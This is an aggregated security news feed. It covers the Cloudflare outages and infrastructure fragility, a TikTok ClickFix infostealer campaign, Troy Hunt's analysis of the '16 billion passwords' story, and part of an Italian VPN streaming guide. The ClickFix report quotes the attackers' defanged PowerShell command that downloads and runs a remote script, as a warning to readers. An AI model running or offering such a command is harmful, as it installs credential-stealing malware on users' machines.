SYSTEMS AMD inches closer to its goal of making AI suck less ... energyHouse of Zen claims latest systems already 4x more efficient than two years ago Google pits Marvell against Broadcom as it chases AI crownAnd Marvell just offered the Chocolate Factory a $12.2B stake to sweeten the deal SYSTEMS Cerebras CS-4 rack systems juice chips for every last drop of AI performanceNext-gen systems double per-chip performance while cramming 3x as many into a rack Security Copilot tricked into telling reseachers how to hack itselfHow to social engineer an AI's reasoning engine AI and ml Payments giant Stripe is about to drop over $7 billion to become a gateway to AI token salesAI gateways look promising as companies struggle with model orchestration Security Russians are posing as Signal support to launch phishing attacksPLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Security Microsoft patches failed to fix on-prem SharePoint, which is now under zero-day attackPLUS: China upgrades smartphone surveillance tools; Ring eases anti-snooping stance; and more Black Hat and DEF CON DEF CON Franklin project enlists hackers to harden critical infrastructureVoting village reports have been so successful, says Jeff Moss, that the whole of DEF CON will now be included Security EQT buys majority share in Swiss cybersecurity biz AcronisWent at equivalent of $3.5B+ valuation for entire firm, though portion sold not specified Malware Month Ten years since the first corp ransomware, Mikko Hyppönen sees no end in sightOn the plus side, infosec's a good bet for a long, stable career FOSS smashed one Microsoft monopoly. After 20 years of failure, it's time to smash anotherWord up GNOME can look like Windows – and Flashback can do it without extensionsNew 'Simple-taskbar' is an option, but there's a simpler, stabler way A moment of silence, please, for the final release of Debian on x86-32New Debian versions hit FOSSland in the form of 13.6 and 12.15 Baddies caught exploiting extensions bugs with perfect 10 scores on vulnerable Joomla websitesFlaws in iCagenda, Balbooa Forms extensions can impact open source CMS that powers a million sites worldwide Frame: A new X11 server – implemented directly in assemblyJoins yserver, Phoenix, and of course XLibre – and outlier Arcan Cinnamon 6.8 will support Wayland – if you want itNext version of Linux Mint’s desktop has both kinds of display server
go.theregister.comDec 22, 2025extracted
Cloudflare down, il problema è la fragilità delle infrastrutture critiche: ecco le soluzioni da adottare
Cloudflare ha spiegato che il prolungato down del 18 novembre 2025 sarebbe da attribuire a un sistema di gestione dei bot modificato, in cui un file ha superato la dimensione massima. Ma il problema non è la causa contingente del peggior disservizio dal 2019 che ha impedito di accedere a molti siti, fra cui spiccano ChatGPT, X e Spotify, bensì la fragilità delle infrastrutture critiche e l’eccessiva dipendenza da poche decine di operatori. Il down di uno, manda in tilt numerosi player. “C’è qualcosa di ironico nell’evoluzione che ha avuto la rete”, commenta Alessandro Curioni, Fondatore di DI.GI Academy, specializzato in Information Security & Cybersecurity: “Nata per essere resiliente in quanto distribuita, oggi, che si parla solo di resilienza, mostra continuamente la sua fragilità in quanto concentrata”. Secondo Pierluigi Paganini, “il blackout globale di Cloudflare ha mostrato quanto l’affidabilità dei servizi digitali dipenda da un numero ristretto di grandi provider“. “Non si tratta solo di un altro contrattempo tecnico. È un esempio perfetto di quanto siamo dipendenti da pochi grandi fornitori di servizi e dei pericoli che questo comporta”, conferma Ramutė Varnelytė, Ceo di IPXO, la piattaforma di gestione delle risorse IP. Ecco come mitigare i rischi, adottando soluzioni di cyber resilienza delle infrastrutture critiche. Indice degli argomenti Questa volta è durato solo mezz’ora, ma il nuovo down di Cloudflare ha prodotto disservizi su Dashboard, API e sul servizio serverless Cloudflare Workers, che migliaia di developer impiegano per l’automatizzazione di opzioni delle loro app. “L’episodio di questa mattina è l’ennesimo promemoria di quanto sia fragile un’Internet che concentra funzioni critiche su pochi grandi fornitori di infrastruttura”, evidenzia Pierluigi Paganini, analista di cyber security e Ceo Cybhorus. rischio sistemico Il nuovo down ha colpito LinkedIn, Vimeo, Canva, Vinted e Perplexity, Zoom, fra gli altri. “Quando un attore come Cloudflare ha un problema, seppur di breve durata, l’effetto non è più il down di un singolo sito, ma uno tsunami che oscura contemporaneamente media, e Commerce, servizi finanziari, SaaS aziendali e perfino gli strumenti pensati per monitorare i disservizi, come downdetector“, avverte Paganini. I motivi dell’outage sarebbero gli stessi dell’ultima volta. “Il punto non è solo la qualità tecnica del singolo provider, ma il rischio sistemico: CDN, DNS gestito, WAF e protezione DDoS sono diventati punti di concentrazione’ imprescindibili. Se uno di questi servizi è indisponibile, una porzione significativa della superficie pubblica del web diventa irraggiungibile. In termini di resilienza, è l’equivalente digitale di avere un’unica centrale elettrica per un intero Paese, un suo malfunzionamento ci porterebbe inevitabilmente al buio. Dipendiamo in modo assoluto da un singolo attore? Troppo spesso la risposta è che la ridondanza è stata sacrificata sull’altare della semplicità e del costo“, conclude Paganini: “Dal punto di vista della ‘sicurezza nazionale digitale’, questi episodi mostrano anche come un singolo punto di failure possa avere effetti quasi equivalenti a un attacco coordinato su larga scala. Non serve compromettere migliaia di siti, basta colpire uno dei grandi hub. Ridisegnare architetture con provider alternativi pronti ad intervenire in caso di malfunzionamenti del fornitore principale, maggiore autonomia locale e test periodici di continuità operativa non sono un lusso, ma una misura di igiene minima indispensabile a garantire continuità e resilienza. Diversificare le dipendenze infrastrutturali è oggi una scelta di sicurezza, non solo di performance”. Il disservizio di Cloudfare si ripercuote su gran parte della Rete, perché l’azienda offre i servizi (DNS, CDN, Reverse Proxy, Firewall, protezione DDoS) a un quinto dei siti web nel mondo. In questo caso, non c’è stato un cyber attacco, ma è bastato un errore (autorizzazione modificata di uno dei sistemi di database che ha raddoppiato le dimensioni di un file, in uso da parte del sistema di gestione dei bot – contenente la lista dei bot da bloccare -, distribuito a tutti i nodi della rete di Cloudflare) per provocare il down. Il vero problema, però, non è tanto il software che incanala il traffico che non è in grado di effettuare la gestione di file con dimensione oltre un certo limite, ma la fragilità delle infrastrutture critiche e le soluzioni possibili, a partire dalla cyber resilienza, da adottare per mitigare questi rischi. “Tutto il sistema ha maturato una dipendenza completa da poche decine di operatori. Le infrastrutture critiche non fanno eccezione”, spiega Alessandro Curioni: “Iniziate a immaginare un ‘balletto del ritorno’ di quelli che abbiamo già visto nell’ambito delle tecnologie digitali. Se poi non è possibile uscire dal cloud allora si tratta di immaginare un piano B analogico magari con tanto di carta e penna”. Ma ovviamente questo è un paradosso. E serve più cyber resilienza. “Sia questo incidente che la recente interruzione di AWS verificatasi alla fine di ottobre dovrebbero servire da ulteriore monito. Cloudflare attualmente contribuisce a gestire e proteggere il traffico di circa il 20% del web. Naturalmente, gli effetti dell’interruzione si sono fatti sentire in tutto il mondo. Anche se è stato divertente scherzare sul fatto che, almeno per un giorno, potevamo essere sicuri che ChatGPT non avesse scritto nessuno dei contenuti che stiamo leggendo, il messaggio chiave che dovremmo trarre da questo incidente è l’importanza di un’infrastruttura resiliente e la necessità di un piano attuabile“, aggiunge Ramutė Varnelytė. Poiché non è possibile fare a meno del cloud computing e al momento è altissima la dipendenza da pochi provider, le soluzioni da adottare per mitigare i rischi riguardano la cyber resilienza e una maggiore sovranità digitale, soprattutto in Europa. Nel frattempo, bisogna assicurare la business continuity. Infatti, “per ridurre l’impatto di futuri guasti serve una strategia tecnica più matura“, spiega Pierluigi Paganini, “le aziende possono adottare approcci multi-cloud e multi-CDN con failover DNS automatici, distribuire carichi e dati su aree geografiche e data center diversi, e mantenere repliche eterogenee per garantire continuità”. In definitiva, “è fondamentale disporre di piani di disaster recovery efficaci e testati periodicamente. Monitoraggi continui, esercitazioni periodiche di failover e accordi con SLA chiari (Service Level Agreement, che fissano gli obiettivi contrattuali verso clienti e fornitori, ndr) accelerano la gestione delle crisi. Infine buona pratica decentralizzare funzioni critiche come autenticazione, DNS, API e logging riducendo i punti di vulnerabilità e aumentando la resilienza complessiva”.
cybersecurity360.itNov 19, 2025extracted
TikTok videos continue to push infostealers in ClickFix attacks
Cybercriminals are using TikTok videos disguised as free activation guides for popular software like Windows, Spotify, and Netflix to spread information-stealing malware. ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one observed by Trend Micro in May The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium. The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware. Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell: iex (irm slmgr[.]win/photoshop) It should be noted that the program name in the URL is different depending on the program that is being impersonated. For example, in the fake Windows activation videos, instead of the URL containing photoshop, it would include windows. In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script. This script downloads two executables from Cloudflare pages, with the first executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. This executable is a variant of the Aura Stealer info-stealing malware. Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts. Mertens says that an additional payload will be downloaded, named source.exe [VirusTotal], which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe). This code is then injected and launched in memory. The purpose of the additional payload remains unclear. Users who perform these steps should consider all of their credentials compromised and immediately reset their passwords on all sites they visit. ClickFix attacks have become very popular over the past year, used to distribute various malware strains in ransomware and cryptocurrency theft campaigns. As a general rule, users should never copy text from a website and run it in an operating system dialog box, including within the File Explorer address bar, command prompt, PowerShell prompts, macOS terminal, and Linux shells. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comOct 19, 2025extracted
That 16 Billion Password Story (AKA "Data Troll")
Spoiler: I have data from the story in the title of this post, it's mostly what I expected it to be, I've just added it to HIBP where I've called it "Data Troll", and I'm going to give everyone a lot more context below. Here goes: Headlines one-upping each other on the number of passwords exposed in a data breach have become somewhat of a sport in recent years. Each new story wants to present a number that surpasses the previous story, and the clickbait cycle continues. You can see it coming a mile away, and you just know the reality is somewhat less than the headline, but how much less? And so it was in June when a story with this title hit the headlines: 16 billion passwords exposed in record-breaking data breach. I thought this would be another standard run-of-the-mill sensational headline that would catch a few eyeballs for a couple of days then be forgotten, but no, apparently not. It started with a huge volume of interest in Have I Been Pwned: That's Google searches for my "little" project, which I found odd, because we hadn't put any data in HIBP! But that initial story gained so much traction and entered the mainstream media to the extent that many publications directed people to HIBP, and inevitably, there was a bunch of searching done to figure out what the service actually was. And the news is still coming out - this story landed on AOL just last week: You know it's serious because of all the red and exclamation marks... but per the article, "you don't need to panic" 🤷♂️ Enough speculating, let's get into what's actually in here, and for that, I went straight to the source: Bob is a quality researcher who has been very successful over the years at sniffing out breached data, some of which had previously ended up in HIBP as a result of his good work. So we had a chat about this trove, and the first thing he made clear was that this isn't a single source of exposure, but rather different infostealer data sets that have been publicly exposed this year. The headlines implying this was a massive breach are misleading; stealer logs are produced from individually compromised machines and occasionally bundled up and redistributed. Bob also pointed out that many of the data sets were no longer exposed, and he didn't have a copy of all of them. But he did have a subset of the data he was happy to send over for HIBP, so let's analyse that. All told, the data Bob sent contained 10 JSON files totalling 775GB across 2.7B rows. An intial cursory check against HIBP showed more than 90% of the email addresses were already in there, and of those that were in previous stealer logs, there was a high correlation of matching website domains. What I mean by this is that if the data Bob sent had someone's email address and password captured when logging into Netflix and Spotify, that person was probably already in HIBP's stealer logs against Netflix and Spotify. In other words, there's a lot of data we've seen before. So, what do we make of all this, especially since the corpus Bob sent is about 17% of the reported 16B headline? Let me speak generally about how these data sets tend to have hyperbolic headlines, and the numbers of actual impact are way smaller: There's usually duplication across files, as the same data appears multiple times There's also often duplication within the same file, again, as the same data reappears A "row" is an instance of someone's email address and password listed next to a website they're logging onto, so 100 distinct rows may all be one person The corpus of data I received contained 2.7B rows, of which I was able to extract 325M unique stealer log entries. That's the number of rows I could successfully parse out website, email address and password values from. In my earlier example with the one person's credentials captured for both Netflix and Spotify, that would mean two unique stealer log records. All of this then distilled down to 109M unique email addresses across all the files, and that's the number you'll now see in HIBP. In other words, 2.7B -> 109M is a 96% reduction from headline to people. Could we apply the same maths to the 16B headline? We'll never know for sure, but I betcha the decrease is even greater; I doubt additional corpuses to the tune of that many billion would continue to add new email addresses, and the duplication ratio would increase. Because it always comes up after loading stealer logs, a quick caveat: Not all email addresses loaded into this breach will contain corresponding stealer log entries. This is because we have one process to regex out all the addresses (the code is open source), and another process that pulls rows with email addresses against valid websites and passwords. And because I'll end up copying and pasting this over and over again in responses to queries, another caveat: Presence in a stealer log is often an indicator of an infected device, but we have no data to indicate when it was infected. There will be a lot of old data in here, just as there's a lot of repackaged data. Of the passwords in valid stealer log entries, there were 231M unique ones, and we'd seen 96% of them before. Those are now all in Pwned Passwords with updated prevalence counts and are searchable via the website and, of course, via the API. Speaking of which, those passwords are presently being searched a lot: Every time I look, there's another billion (or two) pic.twitter.com/X7gflzWdCH — Troy Hunt (@troyhunt) July 30, 2025 Of the 109M email addresses we could parse out of the corpus, 96% of them were already in HIBP (that number coincidentally matches the percentage of existing passwords we track). They weren't all from previous stealer logs, of course, but anecdotally, during my testing, I found a lot of crossover between this one and the ALIEN TXTBASE logs from earlier this year. Regardless, we added 4.4M new addresses from Data Troll that we'd never seen before, so that alone is significant. Not significant enough to justify hyperbolic headlines to the effect of "biggest ever", but still sizeable. To summarise: The 16B headline distils down to a much smaller number of unique values of actual impact The data is largely from stealer logs that have been circulating for some time now It's certainly not fresh and doesn't pose any new risks that weren't already present And lastly, there's that "Data Troll" title. When I first saw this story getting so much traction, the image I had in my mind was of a troll sitting on stashes of data. The mass media then picked this up and turned it into deliberately provocative headlines, manipulating the narrative to seek attention. Hopefully, this post tempers all that a little bit and brings some sanity back into the discussion. We need to take data exposures like this seriously, but it certainly didn't deserve the attention it got.
troyhunt.comAug 13, 2025extracted
Sblocca tutto: le migliori VPN per lo streaming del 2025
Le VPN (Virtual Private Network) sono diventate uno strumento molto popolare per gli appassionati di streaming, in quanto offrono diversi vantaggi, ma presentano anche alcuni aspetti da considerare attentamente. Indice degli argomenti Una VPN crea un “tunnel” crittografato tra il tuo dispositivo e un server remoto gestito dal servizio VPN. In questo modo, il nostro traffico internet viene reindirizzato attraverso questo server prima di raggiungere la sua destinazione finale. Le funzioni principali delle VPN sono: Privacy e sicurezza: La crittografia nasconde il nostro indirizzo IP e le attività online da occhi indiscreti, inclusi il provider di servizi internet (ISP), hacker e altri terzi. Questo è particolarmente utile quando ci si connette a reti Wi-Fi pubbliche non sicure. Accesso a contenuti geograficamente limitati: Questo è l’uso più comune delle VPN per lo streaming. Quando ci si connette a un server VPN in un altro Paese, il nostro indirizzo IP viene mascherato con quello del server. In questo modo, i servizi di streaming vedono che ci stiamo collegando dal Paese scelto e ci permettono di accedere ai cataloghi di contenuti disponibili solo in quella regione. Sblocco di cataloghi internazionali: Si può accedere a serie TV e film disponibili su piattaforme come Netflix, Disney+, Amazon Prime Video, Hulu, ecc., in Paesi diversi dal nostro. Superamento delle restrizioni geografiche: Se siamo in viaggio all’estero, una VPN ci permette di accedere ai nostri servizi di streaming preferiti del nostro Paese di origine, che altrimenti sarebbero bloccati a causa dei contratti di licenza regionali. Evitare il “throttling” dell’ISP: Alcuni provider di servizi internet rallentano (o “throttono”) intenzionalmente la velocità di connessione quando rilevano attività di streaming o di download intenso. Usando una VPN, il nostro ISP non può vedere cosa stiamo facendo online e non può limitare la nostra banda. Sicurezza aggiuntiva: Navigare e fare streaming con una VPN protegge i nostri dati personali, specialmente su reti non protette. Rallentamento della velocità: Il processo di crittografia e il reindirizzamento del traffico attraverso un server remoto possono rallentare leggermente la connessione. Questo può causare buffering o una qualità video inferiore se la VPN non è ottimizzata per la velocità. Costi: I migliori servizi VPN per lo streaming non sono gratuiti. Le VPN gratuite spesso hanno limitazioni di dati, velocità e server, e alcune potrebbero persino compromettere la tua privacy. Incompatibilità con i servizi di streaming: I servizi di streaming sono costantemente impegnati a bloccare l’uso delle VPN. Di conseguenza, non è garantito che una VPN funzioni sempre con tutti i servizi o con tutti i cataloghi. A volte è necessario cambiare server o contattare l’assistenza clienti del provider VPN. Legalità: L’uso di una VPN non è illegale nella maggior parte dei paesi, ma l’utilizzo per aggirare le restrizioni geografiche dei servizi di streaming può violare i termini di servizio di tali piattaforme. È importante informarsi sulle leggi del paese in cui ti trovi. Per scegliere una buona VPN per lo streaming, bisogna considerare questi fattori: Velocità: È il fattore più importante per lo streaming. Cercare servizi che offrono server veloci e protocolli ottimizzati (come Lightway di ExpressVPN o NordLynx di NordVPN). Ampia rete di server: Un numero elevato di server in molti Paesi ti offre più opzioni per sbloccare contenuti da diverse regioni. Capacità di sblocco: Assicurarsii che la VPN sia nota per la sua affidabilità nello sbloccare i servizi di streaming che ci interessano (Netflix, Disney+, ecc.). Compatibilità con i dispositivi: Verificare che il servizio offra app native per tutti i dispositivi che utilizziamo per lo streaming (PC, smartphone, smart TV, console, router, ecc.). Prezzo e garanzia di rimborso: Confrontare i prezzi e cercare servizi che offrano una garanzia di rimborso per poterli provare senza rischi. Sicurezza e privacy: Una buona VPN deve avere una solida politica di “no-log” (non registra le attività) e utilizzare una crittografia robusta. Alcuni dei servizi VPN più apprezzati per lo streaming, spesso menzionati in recensioni e classifiche, includono: Surfshark: Ottima per chi cerca un buon rapporto qualità-prezzo e offre connessioni illimitate. ExpressVPN: Rinomata per la sua velocità e affidabilità. NordVPN: Offre un’ottima combinazione di velocità, sicurezza e un’ampia rete di server. Utilizzare una VPN per lo streaming consente di superare le limitazioni geografiche imposte da molte piattaforme, ampliando notevolmente l’accesso ai contenuti. Servizi come Netflix, Disney+, Prime Video, Hulu e BBC iPlayer offrono cataloghi differenti a seconda del paese da cui ci si collega: una VPN permette di simulare una posizione virtuale in un’altra nazione, sbloccando film, serie TV e programmi esclusivi non disponibili nel proprio territorio. Questo è particolarmente utile per chi viaggia, vive all’estero o semplicemente desidera accedere a titoli presenti in altri mercati. Oltre allo sblocco dei contenuti, una VPN può garantire maggiore stabilità della connessione e protezione contro eventuali throttling operati dai provider internet, che in alcuni casi limitano la velocità durante l’uso di piattaforme video. La questione della portabilità dello streaming in Europa è fondamentale e ha cambiato significativamente il modo in cui i consumatori possono usufruire dei loro abbonamenti. Il quadro normativo di riferimento è il Regolamento (UE) 2017/1128, entrato in vigore il 1° aprile 2018. Questo regolamento, spesso definito “Regolamento Netflix”, ha introdotto l’obbligo per i fornitori di servizi di contenuti online a pagamento di garantire la portabilità transfrontaliera dei servizi all’interno dell’Unione Europea e dell’Area Economica Europea (EEA), che include anche Islanda, Liechtenstein e Norvegia. In poche parole, un cittadino residente in un Paese dell’UE/EEA con un abbonamento a un servizio di streaming a pagamento (come Netflix, Sky Go, Spotify, NOW, Amazon Prime Video, ecc.), ha il diritto di accedere a quel servizio con le stesse modalità, gli stessi contenuti e sullo stesso numero di dispositivi che ha nel suo Paese di residenza, anche quando si trovi temporaneamente in un altro stato membro dell’UE/EEA. Prima di questo regolamento, i fornitori di servizi potevano bloccare l’accesso ai contenuti (tramite il cosiddetto “geoblocking”) quando l’utente si trovava all’estero, a causa delle licenze di distribuzione che erano valide solo per determinati territori. Ora, per gli abbonamenti a pagamento, questa pratica non è più consentita all’interno dell’area UE/EEA. Servizi a pagamento: L’obbligo si applica ai servizi di contenuti online che richiedono un corrispettivo in denaro. I fornitori di servizi gratuiti possono scegliere volontariamente di offrire la portabilità, ma non sono obbligati. Verifica della residenza: I fornitori devono verificare lo Stato membro di residenza dell’abbonato. Possono farlo utilizzando vari metodi, come i dati di fatturazione, l’indirizzo postale, o, in alcuni casi, l’indirizzo IP. Questa verifica deve essere “ragionevole, proporzionata e non discriminatoria”. “Temporaneità” del soggiorno: Il diritto alla portabilità si applica quando l’abbonato è “temporaneamente” presente in un altro Stato membro. Il regolamento non definisce una durata precisa, ma si riferisce a situazioni come vacanze, viaggi di lavoro o studi all’estero. Nessun costo aggiuntivo: L’utente non può subire costi aggiuntivi o restrizioni nella qualità del servizio per la portabilità transfrontaliera. Nonostante il regolamento abbia rappresentato un passo avanti significativo, ci sono ancora alcune sfide e limitazioni: Catalogo di contenuti: Sebbene l’accesso al servizio sia garantito, l’offerta di contenuti potrebbe non essere esattamente la stessa in tutta Europa. Il regolamento garantisce la portabilità del catalogo del Paese di residenza, ma non che il catalogo sia identico in tutti i Paesi. Per esempio, un utente italiano in vacanza in Germania continuerà a vedere il catalogo italiano di Netflix, e non quello tedesco. Servizi gratuiti: I servizi di streaming gratuiti, come quelli delle emittenti pubbliche (es. RaiPlay, BBC iPlayer), non sono obbligati a offrire la portabilità transfrontaliera. Questo significa che, a meno che non scelgano di farlo volontariamente, potremmo non essere in grado di accedere a questi servizi quando siamo all’estero. Qualità del servizio: Il regolamento non obbliga i fornitori a garantire la stessa qualità del servizio al di fuori del Paese di residenza, il che potrebbe portare a differenze nella velocità o nella risoluzione video a seconda della rete utilizzata. Verifica della residenza: Sebbene il regolamento preveda metodi di verifica specifici, i fornitori possono ancora bloccare l’accesso se sospettano che l’utente non sia residente nel Paese dichiarato, ad esempio se l’utente si connette costantemente da un altro Paese. L’uso delle VPN in sé è legale nella maggior parte dei Paesi, Italia inclusa. Tuttavia, quando si parla di streaming, entra in gioco una zona grigia che riguarda i termini di servizio delle piattaforme e l’uso che l’utente ne fa. È importante distinguere tra ciò che è formalmente consentito dalla legge e ciò che viene tollerato o vietato dai fornitori di contenuti. Molte piattaforme di streaming, nei propri termini di utilizzo, specificano che l’accesso ai contenuti è consentito solo all’interno di determinati confini geografici. Questo significa che, pur essendo legale utilizzare una VPN per motivi di sicurezza o privacy, l’uso per modificare la propria area geografica allo scopo di accedere a contenuti non disponibili localmente può violare le regole contrattuali del servizio. In concreto, le aziende non perseguono penalmente gli utenti ma si riservano il diritto di bloccare gli indirizzi IP associati a VPN, di limitare temporaneamente l’account o, in rari casi, di sospendere l’accesso alla piattaforma. Da un punto di vista legale l’utilizzo di una VPN non rappresenta un reato. Tuttavia, accedere a contenuti protetti da licenza in aree dove non se ne detiene il diritto può essere considerato una violazione delle norme contrattuali tra utente e fornitore. In generale, i rischi per l’utente finale sono bassi ma è importante agire con consapevolezza. In alcuni paesi più restrittivi l’utilizzo delle VPN è regolamentato o vietato, perciò prima di utilizzarle in viaggio è opportuno informarsi sulla normativa locale. Resta il fatto che una VPN, se usata correttamente, può essere uno strumento legittimo e potente per garantire la libertà digitale e un accesso più ampio ai contenuti, nel rispetto dei limiti previsti. Quando si cerca una VPN da usare per lo streaming la priorità è la capacità di aggirare i blocchi geografici in modo rapido, affidabile e senza compromessi sulla qualità video. Non tutte le VPN riescono a sbloccare le piattaforme principali, poiché molte di esse aggiornano costantemente i loro sistemi di rilevamento per impedire l’uso di IP condivisi da provider VPN. È quindi fondamentale affidarsi a servizi che aggiornano regolarmente i propri server, che offrono un’ampia scelta di localizzazioni internazionali e che garantiscano velocità di connessione elevate, in grado di supportare lo streaming in HD o 4K senza buffering. Inoltre, è consigliabile optare per una VPN con app ben progettate, compatibili con smart TV, console, Fire Stick o dispositivi mobile, così da rendere l’esperienza di visione fluida e intuitiva. 🌍 Server: 7.000+ server in 118 paesi 📱 Massimo dispositivi: 10 📍 IP dedicato: ✔ 🆓 Versione Free: Garanzia rimborso di 30 giorni 💻 Compatibilità: Windows, macOS, Android, iOS 🔐 Sicurezza: IKEv2/IPsec, OpenVPN, NordLynx 👨💻 Assistenza 24/7: ✔ 🏢 Sede legale: Panama 🔥 Offerte attive: SCONTO fino al 63% L’offerta NordVPN principale si basa su uno sconto a tempo limitato. Il prezzo viene ridotto da 11,59 € a 3,39 € al mese, il che corrisponde a uno sconto fino al 72%. È importante notare che questo prezzo ridotto è valido solo per il periodo iniziale di abbonamento. L’offerta include un abbonamento a NordVPN con diverse funzionalità: VPN (Virtual Private Network): La funzione principale. Cripta la connessione a internet, nascondendo l’indirizzo IP reale e la nostra posizione. Questo rende più difficile per terzi (come il provider di servizi internet, agenzie pubblicitarie o hacker) tracciare le attività online. Threat Protection Pro™: Un servizio che funziona anche quando la VPN non è attiva. Blocca automaticamente download di malware, siti di phishing, pubblicità e tracker online. È un’aggiunta di sicurezza che protegge i nostri dispositivi anche durante la normale navigazione non protetta dalla VPN. Politica di no-log: NordVPN afferma di non registrare le attività online, come i siti che si visitano, i file che si scaricano o i dati di traffico. Questo è un aspetto fondamentale per la privacy. Accesso a una rete globale di server: Si hanno disposizione migliaia di server in 164 località. Questo permette di connettersi a server in diverse parti del mondo, utile per accedere a contenuti con restrizioni geografiche. Compatibilità con più dispositivi: Con un solo account si possono proteggere fino a 10 dispositivi contemporaneamente. NordVPN è compatibile con tutti i principali sistemi operativi (Windows, macOS, iOS, Android, ecc.) e browser. Altre funzionalità: Nell’offerta è inclusa la crittografia di nuova generazione (AES-256) per una sicurezza elevata, un Dark Web Monitor che ci avvisa se le nostre credenziali sono state compromesse e la possibilità di guardare contenuti in streaming senza limiti di velocità o larghezza di banda. E’ possibile richiedere il rimborso entro 30 giorni Nonostante questi punti di forza, NordVPN presenta alcuni svantaggi. I piani possono risultare costosi una volta terminato il periodo promozionale e i rinnovi automatici possono portare a un prezzo significativamente più alto. Inoltre l’interfaccia su dispositivi come Fire Stick o alcune versioni Linux può risultare meno raffinata e in alcuni casi lento nella connessione su server distanti. Peace‑of‑mind per utenti avanzati: le funzioni antivirus integrate in Threat Protection Pro, pur utili, non sostituiscono software antivirus professionali. Al momento sono attive promozioni molto interessanti: il piano biennale Base è disponibile a 3,39 € al mese per nuovi utenti, con garanzia di rimborso entro 30 giorni, mentre con soli 1 € in più al mese si ottiene il piano Plus comprensivo di protezione malware e strumenti aggiuntivi. Ecco le tabelle comparative che riassumono le differenze principali tra i tre piani di NordVPN, considerando l’opzione più comune di abbonamento biennale, annuale e mensile. Esporta in Fogli Il piano Base offre solo il servizio VPN. Se il nostro unico obiettivo è nascondere la nostra posizione e criptare la connessione, questo piano è sufficiente. Il piano Plus aggiunge funzionalità di sicurezza importanti, come la protezione anti-malware, il blocco di pubblicità e tracker, e un password manager con mascheramento dell’email. È l’opzione più popolare perché offre un buon equilibrio tra privacy, sicurezza e prezzo. Il piano Ultimate è il pacchetto più completo, che include tutte le funzionalità del piano Plus, oltre a 1 TB di spazio cloud e un’assicurazione cyber che copre fino a 5.000 € per frodi e furti d’identità. È la scelta ideale per chi cerca la massima protezione e servizi aggiuntivi. 🌍 Server: 3000 server in 105 paesi 📱 Massimo dispositivi: 8 🆓 Versione Free: Garanzia rimborso di 30 giorni 💻 Compatibilità: Windows, macOS, Android, iOS, Linux 🔐 Sicurezza: IKEv2, OpenVPN 👨💻 Assistenza 24/7: ✔ 🏢 Sede legale: Isole Vergini Britanniche 🔥 Offerte attive: SCONTO fino al 49% + 3 mesi GRATIS ExpressVPN è un servizio di rete privata virtuale (VPN) che offre una soluzione completa per la sicurezza e la privacy online: Supporto 24/7: Offre un’assistenza clienti disponibile 24 ore su 24, 7 giorni su 7, tramite live chat. Garantire la privacy e la sicurezza: Crittografa il traffico internet e maschera l’indirizzo IP, rendendo le nostre attività online anonime e proteggendoci da occhi indiscreti come il provider di servizi internet, hacker e pubblicità. Superare le restrizioni geografiche: Permette di connettersi a server in numerosi Paesi in tutto il mondo (attualmente oltre 105), in modo da poter accedere a contenuti e siti web che potrebbero essere bloccati nelle nostre aree geografiche. Questo è particolarmente utile per lo streaming, per accedere a servizi di notizie o per aggirare la censura in alcuni Paesi. Alta velocità e affidabilità: ExpressVPN è noto per la sua velocità di connessione elevata e stabile, grazie anche al suo protocollo proprietario chiamato Lightway. Questo assicura un’esperienza di navigazione fluida e senza interruzioni. Proteggere i dati su più dispositivi: ExpressVPN è compatibile con numerosi sistemi operativi, tra cui Windows, macOS, Android, iOS e Linux. A seconda del piano, si possono collegare un certo numero di dispositivi contemporaneamente (dai 10 ai 14). Funzionalità aggiuntive: Oltre al servizio VPN principale, ExpressVPN offre anche diverse funzionalità extra, specialmente nei piani più avanzati, come: Protezione avanzata: Blocco di annunci pubblicitari, tracker e siti web dannosi. Gestore di password: Un tool per gestire in modo sicuro le credenziali. IP dedicato: Un indirizzo IP che viene utilizzato solo da noi (disponibile solo nel piano Pro). eSIM: Per alcuni piani a lungo termine, ExpressVPN include una eSIM con dati gratuiti da utilizzare in vacanza. Sconto su Aircove: Un router VPN che estende la protezione a tutti i dispositivi della casa. Politica di “no-log”: L’azienda afferma di non registrare l’attività online, le richieste DNS o altre informazioni che potrebbero essere utilizzate per identificare gli utenti. La sua tecnologia TrustedServer garantisce che nessun dato venga salvato sui dischi rigidi dei server. Al momento sono disponibili promozioni che arrivano fino all’82 % di sconto sul piano biennale includendo fino a 6 mesi extra gratuiti. Altri sconti comprendono 49 % di sconto sul piano di 15 mesi o 61 % sul piano biennale, spesso associati a coupon o a offerte riservate a studenti o nuovi utenti. ExpressVPN offre anche una prova gratuita di 7 giorni disponibile tramite App Store o Google Play per dispositivi mobili, e una garanzia di rimborso entro 30 giorni per acquisti tramite sito ufficiale (non sempre valida se sottoscritto tramite Apple App Store). Piano Base: $3.99/mese ($111.72 totali per 28 mesi) Piano Avanzato: $4.99/mese ($139.72 totali per 28 mesi) Piano Pro: $7.99/mese ($223.72 totali per 28 mesi) Piano Base: $4.99/mese ($74.85 totali per 15 mesi) Piano Avanzato: $5.99/mese ($89.85 totali per 15 mesi) Piano Pro: $8.99/mese ($134.85 totali per 15 mesi) Piano Base: $12.99/mese Piano Avanzato: $13.99/mese Piano Pro: $19.99/mese 🌍 Server: 3200+ in 100 paesi 📱 Massimo dispositivi: illimitati 🆓 Versione Free: Garanzia rimborso di 30 giorni 💻 Compatibilità: Windows, macOS, Android, iOS 🔐 Sicurezza: OpenVPN, IKEv2, Shadowsocks, Wireguard e L2TP 👨💻 Assistenza 24/7: ✔ 🏢 Sede legale: Paesi Bassi 🔥 Offerte attive: SCONTO fino all’83% + 3 mesi gratis 🔥 L’offerta Surfshark VPN propone le 